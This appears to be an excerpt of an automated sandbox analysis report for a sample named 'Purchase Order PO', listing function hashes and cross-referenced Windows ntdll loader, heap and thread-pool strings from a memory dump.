                                                                                                                            • Opcode Fuzzy Hash: 02eacbe66722adcfad81422518dd18b1ee765e88936b9395cdbd0413cef3bac5
                                                                                                                            • Instruction Fuzzy Hash: 7AA18C319002299BDB25CFA8CC88BA9B7B5BF58754F1541EED909AB291D7309E84CF90
                                                                                                                            Strings
                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01B03425, 01B03432, 01B03451
                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B03437
                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B0342A
                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B03456
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                            • API String ID: 0-1245972979
                                                                                                                            • Opcode ID: 51e842a8e1512fd0838412f440d13a1b505beac429e6aa07066968126cf876dc
                                                                                                                            • Instruction ID: 9ab193188f8d3ba5ac5bf909b420df96f79bfc1353ddbb65b08390727b0dbbff
                                                                                                                            • Opcode Fuzzy Hash: 51e842a8e1512fd0838412f440d13a1b505beac429e6aa07066968126cf876dc
                                                                                                                            • Instruction Fuzzy Hash: 89612136604612AFD727CF1CC895B2ABBE1FF84B10F19855DE8559F2A0CB34E800CB95
                                                                                                                            Strings
                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AF10AE
                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AF106B
                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AF0FE5
                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AF1028
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                            • API String ID: 0-1468400865
                                                                                                                            • Opcode ID: a4129f914b3e4250bfc66a0a5620c98887d32c5a0c9ef5e1e30e362ecf585a7e
                                                                                                                            • Instruction ID: 62fdcaf719524a03a466a5186223f700c4a4436b522ef2983cb0f817410d13b2
                                                                                                                            • Opcode Fuzzy Hash: a4129f914b3e4250bfc66a0a5620c98887d32c5a0c9ef5e1e30e362ecf585a7e
                                                                                                                            • Instruction Fuzzy Hash: 3371E2B1904305AFCB21DF28C984B9B7FE8EF95764F444468F9498B18AD334D588CBD1
                                                                                                                            Strings
                                                                                                                            • LdrpDynamicShimModule, xrefs: 01AFA998
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AFA9A2
                                                                                                                            • apphelp.dll, xrefs: 01AB2462
                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01AFA992
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-176724104
                                                                                                                            • Opcode ID: dc8d50c4da8e8660028d7c5f83bdffd20d003a977d157e6cbb3f39964e1f3134
                                                                                                                            • Instruction ID: 91a81537e0424c4ff88ea79d78b69fdd8c02127ee609d58f79dfdf576941a9ad
                                                                                                                            • Opcode Fuzzy Hash: dc8d50c4da8e8660028d7c5f83bdffd20d003a977d157e6cbb3f39964e1f3134
                                                                                                                            • Instruction Fuzzy Hash: E8312876610201ABDB31AF99C881EEE7BB4FB84F00F15006EFA04AB256D774A985C780
                                                                                                                            Strings
                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AA327D
                                                                                                                            • HEAP: , xrefs: 01AA3264
                                                                                                                            • HEAP[%wZ]: , xrefs: 01AA3255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                            • API String ID: 0-617086771
                                                                                                                            • Opcode ID: c1c4bf7e98d1bb16cb4be1fbb9cbe21ab7a6a06bf628cbe894e6485584792f10
                                                                                                                            • Instruction ID: 10625da9cac687e7f18a7ef7419c3b31f9602768a1939811ab18a1568a19a976
                                                                                                                            • Opcode Fuzzy Hash: c1c4bf7e98d1bb16cb4be1fbb9cbe21ab7a6a06bf628cbe894e6485584792f10
                                                                                                                            • Instruction Fuzzy Hash: 1A92BD70A042499FDF25CFA8C4447AEBBF1FF48310F5880AAE959AB352D735A945CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-4253913091
                                                                                                                            • Opcode ID: adb1c28ae5a4398c2ce2588c23ed57ae07ac8524cab7db475ea759ddd8aeb046
                                                                                                                            • Instruction ID: cc4f937674d6c11522f8be78465bbf1a95ab2de22b3274dd5550d23e469baae0
                                                                                                                            • Opcode Fuzzy Hash: adb1c28ae5a4398c2ce2588c23ed57ae07ac8524cab7db475ea759ddd8aeb046
                                                                                                                            • Instruction Fuzzy Hash: 78F19C34A00606DFEB25DFA8C994B6ABBF5FF45700F5482A8F5169B391D730E981CB90
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $@
                                                                                                                            • API String ID: 0-1077428164
                                                                                                                            • Opcode ID: 63a67f3e02f024e13d88659e40993fe34c1ca028c8f021186ac1c1b8ab67bcf9
                                                                                                                            • Instruction ID: 52521a313d981d9de71a2af4707f8eaa3baed04bb7f6810b01ff9572a7d242d3
                                                                                                                            • Opcode Fuzzy Hash: 63a67f3e02f024e13d88659e40993fe34c1ca028c8f021186ac1c1b8ab67bcf9
                                                                                                                            • Instruction Fuzzy Hash: 12C283716083859FD725CF69C480BABBBE9AFC8754F04892DFA89C7282D774D844CB52
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                            • API String ID: 0-2779062949
                                                                                                                            • Opcode ID: 0784fbf8def45bc0c88776f17e48fa3a007f6c5f77651c37014b57c6f9bfaf46
                                                                                                                            • Instruction ID: bce567e01a2d668b3c1dc5c7a1c03f282d4f3089bedc82d3de14fd694b672681
                                                                                                                            • Opcode Fuzzy Hash: 0784fbf8def45bc0c88776f17e48fa3a007f6c5f77651c37014b57c6f9bfaf46
                                                                                                                            • Instruction Fuzzy Hash: 27A17E719116299BDB31EF28CD8CBEAB7B8EF44710F0001EAD909A7251E7359E84CF50
                                                                                                                            Strings
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AFA121
                                                                                                                            • LdrpCheckModule, xrefs: 01AFA117
                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 01AFA10F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-161242083
                                                                                                                            • Opcode ID: 4b9ad0c65ebb955bdff0b64f1403dd17ad1528ec59937fd051b90f60b671e1eb
                                                                                                                            • Instruction ID: f38158daa8957a59112b283fc37e3ee0fee0be14b2ce562456105e2ecb6e8dbc
                                                                                                                            • Opcode Fuzzy Hash: 4b9ad0c65ebb955bdff0b64f1403dd17ad1528ec59937fd051b90f60b671e1eb
                                                                                                                            • Instruction Fuzzy Hash: 4271B071A002459FDB25DFA8CA81AFEB7F8FB44B04F19406DE906DB252E734A941CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-1334570610
                                                                                                                            • Opcode ID: ae9d5c74279427359a6e5ed5d8c191070ab6853cdc12ce2665ceb774de2325d9
                                                                                                                            • Instruction ID: de6a356699db978f7e51e3f2bc25bc4f19f923a11bb21c60b51e21f4241a8a01
                                                                                                                            • Opcode Fuzzy Hash: ae9d5c74279427359a6e5ed5d8c191070ab6853cdc12ce2665ceb774de2325d9
                                                                                                                            • Instruction Fuzzy Hash: 4E618F706003019FDB29DF68C650B6ABBF1FF45704F58859DF95A8B292D770E881CB91
                                                                                                                            Strings
                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 01B082DE
                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 01B082D7
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01B082E8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-1783798831
                                                                                                                            • Opcode ID: bf4f33dc1faecdd7bcb74c8eafa0e2fd68401ce6d6c3a81ae20e3989eb4ddad3
                                                                                                                            • Instruction ID: 8e144270009876beb6059772cabdcbb17a3e22dbeaaf7b05ad125342df86f322
                                                                                                                            • Opcode Fuzzy Hash: bf4f33dc1faecdd7bcb74c8eafa0e2fd68401ce6d6c3a81ae20e3989eb4ddad3
                                                                                                                            • Instruction Fuzzy Hash: 0941F271940301ABCB21EB68DD84BAB7BE8EF94F64F04482EF948D7295E770D800CB91
                                                                                                                            Strings
                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B4C1C5
                                                                                                                            • PreferredUILanguages, xrefs: 01B4C212
                                                                                                                            • @, xrefs: 01B4C1F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                            • API String ID: 0-2968386058
                                                                                                                            • Opcode ID: bbdd55deadc43b3e6b1dfa228e00e718b2ec7273faae2b4ec4a1c8a1e12a4728
                                                                                                                            • Instruction ID: e4c3938cf422c4f9a90b5f2448118631e1a6bfa8003bed915de4280234483b8a
                                                                                                                            • Opcode Fuzzy Hash: bbdd55deadc43b3e6b1dfa228e00e718b2ec7273faae2b4ec4a1c8a1e12a4728
                                                                                                                            • Instruction Fuzzy Hash: 5B416271E0120AABDF15DED9C941BEEBBB8FB14B04F1481AAE605A7240E7B49A44DB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                            • API String ID: 0-1373925480
                                                                                                                            • Opcode ID: 1544f44091b1062b388e7dd9af249cbb0e20b8b99a391d8315d5e827bc237278
                                                                                                                            • Instruction ID: d3700e7fb495f7d3c8eb09baae9436c37f33dfa2ed0ccd9dae08dc1eac7b28a4
                                                                                                                            • Opcode Fuzzy Hash: 1544f44091b1062b388e7dd9af249cbb0e20b8b99a391d8315d5e827bc237278
                                                                                                                            • Instruction Fuzzy Hash: C5413A31A00368CFEB2ADBDAC944BADBBB4FF56340F240599D905EBB81D7748909CB50
                                                                                                                            Strings
                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B14888
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01B14899
                                                                                                                            • LdrpCheckRedirection, xrefs: 01B1488F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                            • API String ID: 0-3154609507
                                                                                                                            • Opcode ID: 4874ec64d9ed4dce163d33fd52b9a6a75ef7e933a360655c9c892d5cc6df430c
                                                                                                                            • Instruction ID: 4c397cab176f89c70297bb97ea3504d62978138c5bb00364776fe8fcf9356cbe
                                                                                                                            • Opcode Fuzzy Hash: 4874ec64d9ed4dce163d33fd52b9a6a75ef7e933a360655c9c892d5cc6df430c
                                                                                                                            • Instruction Fuzzy Hash: 9841C172A142519FCB2ADE5CD840A267BE4FF49B50F4B06E9ED49D7319D730D800CB91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-2558761708
                                                                                                                            • Opcode ID: 51b3383b53c2655b0de2e1632032cd34dc10499f429b61ab26032593a0e616a2
                                                                                                                            • Instruction ID: 890493236765cc3cb3d44f902f53b59dc207bad7f7ea900eb548451afb52868d
                                                                                                                            • Opcode Fuzzy Hash: 51b3383b53c2655b0de2e1632032cd34dc10499f429b61ab26032593a0e616a2
                                                                                                                            • Instruction Fuzzy Hash: 6111EB317142029FDB29DF28C680B7AB3A6EF40A16F18816EF506CB2A2DB34EC40C754
                                                                                                                            Strings
                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 01B120F3
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01B12104
                                                                                                                            • LdrpInitializationFailure, xrefs: 01B120FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2986994758
                                                                                                                            • Opcode ID: 6fdd6b9aa6971efca475c95ad35a05d0b1903846f3d7fc3c53c1b4d654517e0f
                                                                                                                            • Instruction ID: f5fa9d6c5a2e7ed8d11869d2660679cfbd93e686b77391b8f370b7397208e561
                                                                                                                            • Opcode Fuzzy Hash: 6fdd6b9aa6971efca475c95ad35a05d0b1903846f3d7fc3c53c1b4d654517e0f
                                                                                                                            • Instruction Fuzzy Hash: 78F04635640308BBEB28EA0DCC43F993BA8FB41F04F6500E9FA00B7285D3B0EA40C680
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: #%u
                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                            • Opcode ID: ec43b719a97cd4e242a9ed9ed002476cb3357ba36d7cccf93fd781fe1dc41f8d
                                                                                                                            • Instruction ID: c1ff745f2c403a5e10cf0126fb7b620d7b6e4c9df588b43b4ea66f31400b36f2
                                                                                                                            • Opcode Fuzzy Hash: ec43b719a97cd4e242a9ed9ed002476cb3357ba36d7cccf93fd781fe1dc41f8d
                                                                                                                            • Instruction Fuzzy Hash: 13715C71A0014A9FDB15DFA8CA94BAEB7F8BF18704F144069EA05E7251EB34ED45CBA0
                                                                                                                            Strings
                                                                                                                            • LdrResSearchResource Enter, xrefs: 01A9AA13
                                                                                                                            • LdrResSearchResource Exit, xrefs: 01A9AA25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                            • API String ID: 0-4066393604
                                                                                                                            • Opcode ID: 181dfbdab8888cddd74df7a37573cbf851e5f4eb49b6496a844c8beccbead8f2
                                                                                                                            • Instruction ID: 46aaec04208ae49d9c4aadd30b25d6a5c8f2f20d3cada729eb3eba6b34308184
                                                                                                                            • Opcode Fuzzy Hash: 181dfbdab8888cddd74df7a37573cbf851e5f4eb49b6496a844c8beccbead8f2
                                                                                                                            • Instruction Fuzzy Hash: 4FE14D71A00219ABEF26CFD9C980BAEBBB9BF44314F14452BFA01E7651D778D981CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `$`
                                                                                                                            • API String ID: 0-197956300
                                                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                            • Instruction ID: 6990bcbcecfa4102ef0b1bbff9c84cdecda8697cc944d0d926cfa739ccdcca30
                                                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                            • Instruction Fuzzy Hash: 2CC1BF312043429BEB69CF28C841B6BBBE5EFC4318F084B6DFA96AB290D775D505CB51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                            • Opcode ID: 1b6891eb3d4236817e07dd70b2e7a40dc895011670a86d6788925afe02ac194a
                                                                                                                            • Instruction ID: 35deaf5b43da54bd829ac88bba354a39001c2f271fcc46c1a9711ef95d679532
                                                                                                                            • Opcode Fuzzy Hash: 1b6891eb3d4236817e07dd70b2e7a40dc895011670a86d6788925afe02ac194a
                                                                                                                            • Instruction Fuzzy Hash: F2614D71E047099FDB1ADFA8C940BADBBB9FB44700F1445ADE649EB291D731EA00CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$MUI
                                                                                                                            • API String ID: 0-17815947
                                                                                                                            • Opcode ID: bbd5492281201e4abd0e9037416e8ecb500cd28bdbdc59f7252dc8732627621f
                                                                                                                            • Instruction ID: a7445de241af0b03cca759954552118688880303443af67c6cc180c2196598b2
                                                                                                                            • Opcode Fuzzy Hash: bbd5492281201e4abd0e9037416e8ecb500cd28bdbdc59f7252dc8732627621f
                                                                                                                            • Instruction Fuzzy Hash: 33513771E0061DAFDF15DFA9CD80AEEBBB8EB48754F10056AE611B7290D7349A05CBA0
                                                                                                                            Strings
                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A9063D
                                                                                                                            • kLsE, xrefs: 01A90540
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                            • API String ID: 0-2547482624
                                                                                                                            • Opcode ID: 3529ab36b9d5978c2c84593c93d7216a51e2a07fe0ea4bcd9c6420b250bf6df6
                                                                                                                            • Instruction ID: 5ebc3c5a9a2bb5024f6d34246ee44d5e39c09df5a3942f50d4fd0dd63a716e2e
                                                                                                                            • Opcode Fuzzy Hash: 3529ab36b9d5978c2c84593c93d7216a51e2a07fe0ea4bcd9c6420b250bf6df6
                                                                                                                            • Instruction Fuzzy Hash: 0E51C2715047429FDB24EF78C6406A7BBE9AF84344F10883EFADA87241E770E585CB92
                                                                                                                            Strings
                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 01A9A2FB
                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 01A9A309
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                            • API String ID: 0-2876891731
                                                                                                                            • Opcode ID: 8b1baab241e3cae1952c57a14ed9ff83e71bf6dbd5f96560719f82839917ec95
                                                                                                                            • Instruction ID: 65b47bf51c575c9eb632f775444bbbf5dcad916a21a8c12a89a43ddd8c330e3d
                                                                                                                            • Opcode Fuzzy Hash: 8b1baab241e3cae1952c57a14ed9ff83e71bf6dbd5f96560719f82839917ec95
                                                                                                                            • Instruction Fuzzy Hash: 05419035A04649DBEF15CF99C440B6ABBF4FF84704F2840AAEE14DB251E3B5D980CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                            • Opcode ID: ad168695728b6cf0d778b33c95467a6afafb5a431a9973c5f921df1a0b51d57f
                                                                                                                            • Instruction ID: 609ca21b74aefdd387f4f2a37e5d8c0746d6645aebb8fafc64162731fb921bde
                                                                                                                            • Opcode Fuzzy Hash: ad168695728b6cf0d778b33c95467a6afafb5a431a9973c5f921df1a0b51d57f
                                                                                                                            • Instruction Fuzzy Hash: 3401DCB2650748AFD321DF24CE45B6677E8EB84B29F04893DB658C7190F734E804CB46
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 0-1339004836
                                                                                                                            • Opcode ID: 67833353a4a967bf3d1e7608b89caee2ce09a08bc250fe7dcfde6c7f81973b69
                                                                                                                            • Instruction ID: b4e59845bd04c59a70c004c848b2c85e72ebdd34153d179c754d6b2125e1afd6
                                                                                                                            • Opcode Fuzzy Hash: 67833353a4a967bf3d1e7608b89caee2ce09a08bc250fe7dcfde6c7f81973b69
                                                                                                                            • Instruction Fuzzy Hash: 0B826975E006189FEF25CFA9C980BEDBBF1BF48720F14816AE919AB255D73099C1CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: 4524cc798feecf9a6a66b226b3a9228b9fea09d892fd7891d7865801645ecbd6
                                                                                                                            • Instruction ID: 62033f55481e71fd7b2216a00f75b8a0bd60de792fb8dcd9e43af72e9a913373
                                                                                                                            • Opcode Fuzzy Hash: 4524cc798feecf9a6a66b226b3a9228b9fea09d892fd7891d7865801645ecbd6
                                                                                                                            • Instruction Fuzzy Hash: F9918171901219AFEB25DF98CD85FEEBBB8EF18750F510065F600AB195D774AD04CBA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
